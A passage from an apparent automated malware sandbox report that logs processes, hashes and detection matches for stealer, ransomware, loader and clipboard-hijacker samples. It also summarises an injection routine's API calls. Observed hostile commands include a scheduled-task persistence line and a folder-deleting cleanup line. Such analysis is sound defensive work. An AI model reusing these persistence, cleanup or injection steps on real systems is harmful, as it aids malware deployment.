                                                                                              Commandline:"C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Has exited:true

                                                                                              Target ID:32
                                                                                              Start time:15:29:58
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              Imagebase:0x400000
                                                                                              File size:306'688 bytes
                                                                                              MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 87%, ReversingLabs
                                                                                              Has exited:true

                                                                                              Target ID:33
                                                                                              Start time:15:29:59
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Has exited:true

                                                                                              Target ID:34
                                                                                              Start time:15:30:01
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Roaming\rujtcgu
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\rujtcgu
                                                                                              Imagebase:0x400000
                                                                                              File size:240'128 bytes
                                                                                              MD5 hash:A25AC46E5BEA920465D1838177782E5B
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Has exited:true

                                                                                              Target ID:35
                                                                                              Start time:15:30:07
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              Imagebase:0x400000
                                                                                              File size:306'688 bytes
                                                                                              MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              Has exited:false

                                                                                              Target ID:36
                                                                                              Start time:15:30:07
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                              Imagebase:0xf30000
                                                                                              File size:187'904 bytes
                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:37
                                                                                              Start time:15:30:07
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:41
                                                                                              Start time:15:30:31
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876
                                                                                              Imagebase:0x7ff6e8e00000
                                                                                              File size:570'736 bytes
                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:42
                                                                                              Start time:15:30:34
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:explorer.exe
                                                                                              Imagebase:0x7ff72b770000
                                                                                              File size:5'141'208 bytes
                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              Target ID:47
                                                                                              Start time:15:30:37
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:48
                                                                                              Start time:15:30:38
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:6.3%
                                                                                                Dynamic/Decrypted Code Coverage:51.9%
                                                                                                Signature Coverage:42.3%
                                                                                                Total number of Nodes:52
                                                                                                Total number of Limit Nodes:3
                                                                                                execution_graph 3570 403031 3571 40303a 3570->3571 3572 402fbf 3570->3572 3575 4019b2 3572->3575 3574 402fda 3576 4019c3 3575->3576 3577 4019fc Sleep 3576->3577 3578 401a17 3577->3578 3580 401a28 3578->3580 3581 4015d5 3578->3581 3580->3574 3582 4015e4 3581->3582 3583 401688 NtDuplicateObject 3582->3583 3592 4017a4 3582->3592 3584 4016a5 NtCreateSection 3583->3584 3583->3592 3585 401725 NtCreateSection 3584->3585 3586 4016cb NtMapViewOfSection 3584->3586 3588 401751 3585->3588 3585->3592 3586->3585 3587 4016ee NtMapViewOfSection 3586->3587 3587->3585 3589 40170c 3587->3589 3590 40175b NtMapViewOfSection 3588->3590 3588->3592 3589->3585 3591 401782 NtMapViewOfSection 3590->3591 3590->3592 3591->3592 3592->3580 3593 2e51db3 3596 2e51dc4 3593->3596 3597 2e51dd3 3596->3597 3600 2e52564 3597->3600 3601 2e5257f 3600->3601 3602 2e52588 CreateToolhelp32Snapshot 3601->3602 3603 2e525a4 Module32First 3601->3603 3602->3601 3602->3603 3604 2e525b3 3603->3604 3605 2e51dc3 3603->3605 3607 2e52223 3604->3607 3608 2e5224e 3607->3608 3609 2e5225f VirtualAlloc 3608->3609 3610 2e52297 3608->3610 3609->3610 3610->3610 3611 402f3d 3612 402f4e 3611->3612 3613 4019b2 8 API calls 3612->3613 3614 402fda 3612->3614 3613->3614 3615 2e2003c 3616 2e20049 3615->3616 3628 2e20e0f SetErrorMode SetErrorMode 3616->3628 3621 2e20265 3622 2e202ce VirtualProtect 3621->3622 3624 2e2030b 3622->3624 3623 2e20439 VirtualFree 3626 2e204be LoadLibraryA 3623->3626 3624->3623 3627 2e208c7 3626->3627 3629 2e20223 3628->3629 3630 2e20d90 3629->3630 3631 2e20dad 3630->3631 3632 2e20dbb GetPEB 3631->3632 3633 2e20238 VirtualAlloc 3631->3633 3632->3633 3633->3621

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 85 40156b-401577 86 4015a3-4015a6 85->86 87 401579-40157e 85->87 90 4015a8-4015c7 86->90 91 4015fe-401632 call 40125c 86->91 88 401580-401599 87->88 89 40154a-401551 87->89 88->86 93 401553-401569 89->93 94 40151d-401546 call 40125c 89->94 90->91 103 401634 91->103 104 401637-40163c 91->104 93->85 94->89 103->104 106 401642-401653 104->106 107 401959-401961 104->107 111 401957 106->111 112 401659-401682 106->112 107->104 110 401966-4019af call 40125c 107->110 111->110 112->111 119 401688-40169f NtDuplicateObject 112->119 119->111 121 4016a5-4016c9 NtCreateSection 119->121 123 401725-40174b NtCreateSection 121->123 124 4016cb-4016ec NtMapViewOfSection 121->124 123->111 127 401751-401755 123->127 124->123 126 4016ee-40170a NtMapViewOfSection 124->126 126->123 129 40170c-401722 126->129 127->111 130 40175b-40177c NtMapViewOfSection 127->130 129->123 130->111 132 401782-40179e NtMapViewOfSection 130->132 132->111 135 4017a4 call 4017a9 132->135
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
                                                                                                • Instruction ID: 4068bc8a221ecf0939acbdb1e7e88c7e46ae7771e33a0dc799c943c57428cfd7
                                                                                                • Opcode Fuzzy Hash: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
                                                                                                • Instruction Fuzzy Hash: AC717CB4900205BFDB209F91CC48F9BBFB8FF96710F14416AFA52BA2E5D6749901CB64

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 138 4015d5-401605 143 401608-401632 call 40125c 138->143 144 4015fb-401601 138->144 150 401634 143->150 151 401637-40163c 143->151 144->143 150->151 153 401642-401653 151->153 154 401959-401961 151->154 158 401957 153->158 159 401659-401682 153->159 154->151 157 401966-4019af call 40125c 154->157 158->157 159->158 166 401688-40169f NtDuplicateObject 159->166 166->158 168 4016a5-4016c9 NtCreateSection 166->168 170 401725-40174b NtCreateSection 168->170 171 4016cb-4016ec NtMapViewOfSection 168->171 170->158 174 401751-401755 170->174 171->170 173 4016ee-40170a NtMapViewOfSection 171->173 173->170 176 40170c-401722 173->176 174->158 177 40175b-40177c NtMapViewOfSection 174->177 176->170 177->158 179 401782-40179e NtMapViewOfSection 177->179 179->158 182 4017a4 call 4017a9 179->182
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
                                                                                                • Instruction ID: 31d3dea579921dc9a2cae9d470b126ee15754b3dfc7efa49c87a4de0449774b7
                                                                                                • Opcode Fuzzy Hash: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
                                                                                                • Instruction Fuzzy Hash: 3D615EB4900205FBEF209F95CC49FAF7BB8EF81700F14412AFA52BA1E4D6759901DB65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 185 401603-401605 187 401608-401632 call 40125c 185->187 188 4015fb-401601 185->188 194 401634 187->194 195 401637-40163c 187->195 188->187 194->195 197 401642-401653 195->197 198 401959-401961 195->198 202 401957 197->202 203 401659-401682 197->203 198->195 201 401966-4019af call 40125c 198->201 202->201 203->202 210 401688-40169f NtDuplicateObject 203->210 210->202 212 4016a5-4016c9 NtCreateSection 210->212 214 401725-40174b NtCreateSection 212->214 215 4016cb-4016ec NtMapViewOfSection 212->215 214->202 218 401751-401755 214->218 215->214 217 4016ee-40170a NtMapViewOfSection 215->217 217->214 220 40170c-401722 217->220 218->202 221 40175b-40177c NtMapViewOfSection 218->221 220->214 221->202 223 401782-40179e NtMapViewOfSection 221->223 223->202 226 4017a4 call 4017a9 223->226
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                                • String ID:
                                                                                                • API String ID: 1652636561-0
                                                                                                • Opcode ID: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
                                                                                                • Instruction ID: 0ca0715bd940020d1e7da968824c045868daa20d03b9e32912d168e5fb042320
                                                                                                • Opcode Fuzzy Hash: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
                                                                                                • Instruction Fuzzy Hash: 21513AB4900245BFEF209F91CC48FAB7BB8EF86700F144159FA11BA1A5D6759901CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 229 4015e0-401605 232 401608-401632 call 40125c 229->232 233 4015fb-401601 229->233 239 401634 232->239 240 401637-40163c 232->240 233->232 239->240 242 401642-401653 240->242 243 401959-401961 240->243 247 401957 242->247 248 401659-401682 242->248 243->240 246 401966-4019af call 40125c 243->246 247->246 248->247 255 401688-40169f NtDuplicateObject 248->255 255->247 257 4016a5-4016c9 NtCreateSection 255->257 259 401725-40174b NtCreateSection 257->259 260 4016cb-4016ec NtMapViewOfSection 257->260 259->247 263 401751-401755 259->263 260->259 262 4016ee-40170a NtMapViewOfSection 260->262 262->259 265 40170c-401722 262->265 263->247 266 40175b-40177c NtMapViewOfSection 263->266 265->259 266->247 268 401782-40179e NtMapViewOfSection 266->268 268->247 271 4017a4 call 4017a9 268->271
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
                                                                                                • Instruction ID: f8a4b5919756d8021f5b889f0f58571870373b5bf4bcbac62585d3645815d21d
                                                                                                • Opcode Fuzzy Hash: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
                                                                                                • Instruction Fuzzy Hash: 1D512AB4900245BFEF209F91CC48FAB7BB8EF85B00F14416AFA11BA1A5D6759945CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 274 4015f1-401605 279 401608-401632 call 40125c 274->279 280 4015fb-401601 274->280 286 401634 279->286 287 401637-40163c 279->287 280->279 286->287 289 401642-401653 287->289 290 401959-401961 287->290 294 401957 289->294 295 401659-401682 289->295 290->287 293 401966-4019af call 40125c 290->293 294->293 295->294 302 401688-40169f NtDuplicateObject 295->302 302->294 304 4016a5-4016c9 NtCreateSection 302->304 306 401725-40174b NtCreateSection 304->306 307 4016cb-4016ec NtMapViewOfSection 304->307 306->294 310 401751-401755 306->310 307->306 309 4016ee-40170a NtMapViewOfSection 307->309 309->306 312 40170c-401722 309->312 310->294 313 40175b-40177c NtMapViewOfSection 310->313 312->306 313->294 315 401782-40179e NtMapViewOfSection 313->315 315->294 318 4017a4 call 4017a9 315->318
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
                                                                                                • Instruction ID: 5a7ae9765c1c855b3f83e93a3bcaaff71aa811e3383dbed8b01ddf0fe81d9004
                                                                                                • Opcode Fuzzy Hash: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
                                                                                                • Instruction Fuzzy Hash: CD512AB4900205BBEF209F91CC49FAB7BB8EF85B00F14412AFA11BA1E5D6759941CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 321 4015f5-401605 324 401608-401632 call 40125c 321->324 325 4015fb-401601 321->325 331 401634 324->331 332 401637-40163c 324->332 325->324 331->332 334 401642-401653 332->334 335 401959-401961 332->335 339 401957 334->339 340 401659-401682 334->340 335->332 338 401966-4019af call 40125c 335->338 339->338 340->339 347 401688-40169f NtDuplicateObject 340->347 347->339 349 4016a5-4016c9 NtCreateSection 347->349 351 401725-40174b NtCreateSection 349->351 352 4016cb-4016ec NtMapViewOfSection 349->352 351->339 355 401751-401755 351->355 352->351 354 4016ee-40170a NtMapViewOfSection 352->354 354->351 357 40170c-401722 354->357 355->339 358 40175b-40177c NtMapViewOfSection 355->358 357->351 358->339 360 401782-40179e NtMapViewOfSection 358->360 360->339 363 4017a4 call 4017a9 360->363
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
                                                                                                • Instruction ID: 051afd1cfa3f53c1d66a227bdc9b807376e364d6cbb67a4c48344ec6a8846052
                                                                                                • Opcode Fuzzy Hash: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
                                                                                                • Instruction Fuzzy Hash: A5512AB4900205BFEF209F91CC48FAF7BB8EF85B00F144169FA11BA1E5D6759941CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 366 4015f8-401632 call 40125c 374 401634 366->374 375 401637-40163c 366->375 374->375 377 401642-401653 375->377 378 401959-401961 375->378 382 401957 377->382 383 401659-401682 377->383 378->375 381 401966-4019af call 40125c 378->381 382->381 383->382 390 401688-40169f NtDuplicateObject 383->390 390->382 392 4016a5-4016c9 NtCreateSection 390->392 394 401725-40174b NtCreateSection 392->394 395 4016cb-4016ec NtMapViewOfSection 392->395 394->382 398 401751-401755 394->398 395->394 397 4016ee-40170a NtMapViewOfSection 395->397 397->394 400 40170c-401722 397->400 398->382 401 40175b-40177c NtMapViewOfSection 398->401 400->394 401->382 403 401782-40179e NtMapViewOfSection 401->403 403->382 406 4017a4 call 4017a9 403->406
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
                                                                                                • Instruction ID: 3f624420ec53c22d9d437f9961cb7ed2e3b3007a845c559fed4a58de007b3d88
                                                                                                • Opcode Fuzzy Hash: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
                                                                                                • Instruction Fuzzy Hash: 105129B4900245BFEF209F91CC48FEBBFB8EF86B10F140159FA11BA2A5D6759945CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
